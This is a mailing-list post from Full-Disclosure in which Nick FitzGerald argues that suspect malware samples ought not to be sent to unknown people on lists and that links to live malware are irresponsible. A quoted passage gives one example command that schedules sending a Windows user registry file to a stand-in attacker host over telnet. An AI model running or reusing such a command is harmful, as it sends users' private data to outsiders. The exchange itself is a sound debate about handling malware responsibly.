Re: win2kup2date.exe ?

[Nick FitzGerald <nick () virus-l demon co uk>]

James Tucker to Harlan Carvey to me to :

>  > > > > ...  If you want to email me a copy of it, I'll
> > > > > rip it apart and see what can be seen.
> > > >
> > > > And world plus dog should entrust you with such
> > > material because???
> > > ... most viruses, trojans and malware to not store
> > > copies of stolen
> > > data in their executables. Furthermore the file size
> > > is very small.
> >
> > Interesting answer, but completely non-sequitor.  Nick
> > asked why this person should be trusted with a live
> > bit of malware, and your response is that it's not
> > very big???  What does that have to do with anything?
>
> Malware and viruses are VERY readily available in many places accross
> the internet. Therefore this point should be of no concern.  ...

It feels good when you stop hitting your head aginst the door too, and 
there are very many doors readily available for you to hit your head 
against.  Now, I don't know James, but I'd say it is a fair bet he 
doesn't hit his head against every door he sees just so he can enjoy 
the feeling when he stops hitting his head against each specific door.

Look fool -- just because samples of some malware are easily accessible 
to you does not mean it is a good idea to encourage others to liberally 
spray copies of probably-new-and-undetected-by-many-scanners malware 
around willy nilly.  Such encouragement is ethically dubious, at 
best...

> ...  The only
> other concern which may be important is the possibility that the
> binary is carrying data from the infected system; it was this that I
> was refering to. Please accept my apology for not making this clearer.

And that was all but irrelevant to my concerns.  It is a possibility, 
and all the more reason to be sure that you really are sending your 
suspect files to a "true professional" but almost by definition, some 
arbitrary twit popping up in a mailing list or newsgroup saying "email 
me a copy of it, I'll rip it apart and see what can be seen" is _NOT_ 
such a person.  (And, if you look at the website at the domain of his 
preferred address for recaiving "suspect" files, you have to question 
even further the suitability of this person...)

>  > > > P.S. Send it to [...] - it's my "catch all" for
> > > > > virus/unknown files. Just be sure to ZIP it up
> > > or else the web host
> > > > > won't let it through. Otherwise I have disabled
> > > all checks/scan.
> > > > > Downloads directly to a secured Linux box.
> > > >
> > > > That's all very nice, but alone, far from the
> > > makings of someone to
> > > > entrust arbitrary, suspected malware samples to.
> > >
> > > "Entrust", just what exactly are you thinking you
> > > might be giving away?
> >
> > Well, it's pretty obvious...a live bit of malware.
> > It's really pretty obvious what Nick's getting
> > at...why send this malware to some arbitrary person?
> > Who's to say that he's going to use it as he says, and
> > not send it back out to someone else?
>
> To what end? It would be much more useful to an attacker to go and
> collect and customise one of the many readily available trojans on the
> internet, rather than spreading malware which they have no control
> over. IMHO your concern is closer to cynicism than practical reality.

Without knowing what the malware in question was or the skills of the 
recipient (assuming, for a moment, that they may actually have had bad 
intentions), you cannot even begin to decide what is easier for them.  
Also, studying something that turned out to be entirely new may give 
someone with ill intent a better idea of how to beat the odds with 
their next release.

But of course, that doesn't matter because the Internet is full of 
nasties so a few more makes no difference, eh James?

Have you hit your head against that door just over to your right 
recently?  A few really hard thwacks will be especially satisfying...

<<snip Virus Total stuff>>
> > > Samples of non-data carrying viruses or
> > > trojans are of
> > > little use to anyone other than Anti-Virus firms, as
> > > it is easy to
> > > collect raw source for most if one is so inclined.

Malware source code is all but useless to the AV industry.  It has to 
detect the actual code that ends up in actual malware which mostly 
means the binary output of compilation and linking.  Having the source 
may help one work out a few wrinkles that the reverse engineering 
analysis did not resolve (usually because the time/effort/payoff 
estimates suggested it was not worthwhile).  Such code is especially 
useful to the wannabe virus writer though, and almost never to 
professional AV researchers as, in the cases where source is released, 
it usually is not released until well after the AV'ers have anaylsed 
actual samples, added detection (and removal, etc) to their products 
and long since moved on.

I guess your inability to comprehend this before writing the drivel 
above tells us even more about the value of your opinions about the 
desirability of sending arbitrary suspect code to arbitrary bozos that 
pop up on mailing lists...

Oh look behind you -- there's another door...

> > Really?  Are you able to do so?  I would submit that
> > many with malicious intent don't know the sites and
> > sources you seem to be aware of, and will actually ask
> > for the binary...for the purpose of releasing it
> > against someone else.  Non-data carrying or otherwise,
> > it doesn't matter.  I received several IMs just this
> > weekend in which I was asked for running viruses.
>
> Well, the same lack of trust may be given to you.  ...

Not at all.

Your inability again to comprehend what has been said shows your severe 
lack of relevant experience.  Very, very many folk of ill-intent 
approach people who publicly discuss malware (such as in this list), 
asking for code "to get back at my cheating girlfriend", etc, etc, etc. 
In fact, it's something of an occupational hazard.  For all we know, 
the chap my original message in this sub-thread was addressed to may 
just be too stupid to come up with anything better than soliciting for 
samples in an open mailing list where folk often ask questions such as 
"What does qwertyuiop.exe do?".

> ...  In order find a
> balence between proving my point and not providing you with up to date
> info, I will provide you with this [...] site as an
> example, which is not carrying any modern sources at this time. You
> can find these easily by trawling security sites of high standards,
> they have outbound links to such sites. 

You have that backwards.

In general, the more such links a security site has, the lower its 
standard.  Posting links to live malicious code is somewhere between 
grossly irresponsible and criminally negligent.  Your "praise" of the 
practise tells us something about your mindset (though maybe it's being 
unhinged by all those doors?).

> ...  Google is rarely your freind
> in this regard, which may be why you are not aware of the high
> numeracy of such sites on the internet. Needless to say that this lack
> of awareness is possibly a good thing for most people (read: reduces
> script-kiddie access to such data).

At least here we agree on something...

<<snip more Virus Total stuff>>
> > > If there are viruses which commonly copy target
> > > system data, or
> > > sensitive data into their binaries at the present
> > > time (I imagine the
> > > mention of this deception may well spring at least
> > > one such virus)
> > > then I apologise that I am not aware of it.
> >
> > Does it matter exactly what the malicious code does?
>
> In this case the deception could be very serious as capturing the
> password details of a security professional is arguably more
> "interesting" and might (possibly) be more valuable to an attacker.
> This would be a good deceptive method of doing so.
>
> As to whether generically it matters what a virus does, no, of course
> if a virus is defined as being such, it is malicious and should be
> removed anyway.

I think Harlan's (rather obvious) point was that it does not matter 
what it does as it is irresponsible to distribute malicious code willy 
nilly regardless of how mad or relatively benign it is.

> Sometimes it is important to know its functionality, as what if it had
> secretly run a  command like:
> at 18:30 "echo ntuser.dat | telnet haxorsite.com:1337"
>
> The antivirus program would remove the virus, but your registry data
> would still get sent to the hacker site as this data is not illegal in
> the system. Before anyone has a go at me over access to ntuser.dat /
> timing issues / whatever, this is concept example only; use your heads
> please.

And the OP may benefit from discovering that and trying to run a DNS 
spoof of haxorsite.com against the sender's domain...

It all comes back to my question "And world plus dog should entrust 
[OP] with such material because???".

> > > There is always no need for aggressive statement of
> > > suspicion, which you are close to here.
> > > While I understand aggression due to anger, I
> > > am concerned that one should not get angry at
> > > someone offering them a
> > > service merely because one is suspicious of them.
> > > What if the offer of help is entirely genuine?
> >
> > I think that you're entirely missing the point, as
> > I've already pointed out.
>
> I apologise that this message of mine was not as clear as it should
> have been. Thank you for pointing it out to me.

And you missed the point of what you perceived as my anger -- that's 
just one of my common posting styles.  You may see it as anger, but 
those that know better see it as the sharper side of my "here comes 
another one" attitude, honed over many, many years more experience of 
dealiing with fools than is healthy (at least for the new fools that 
come along every day).

Quick -- around the corner to your left, there's another door...


Regards,

Nick FitzGerald

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html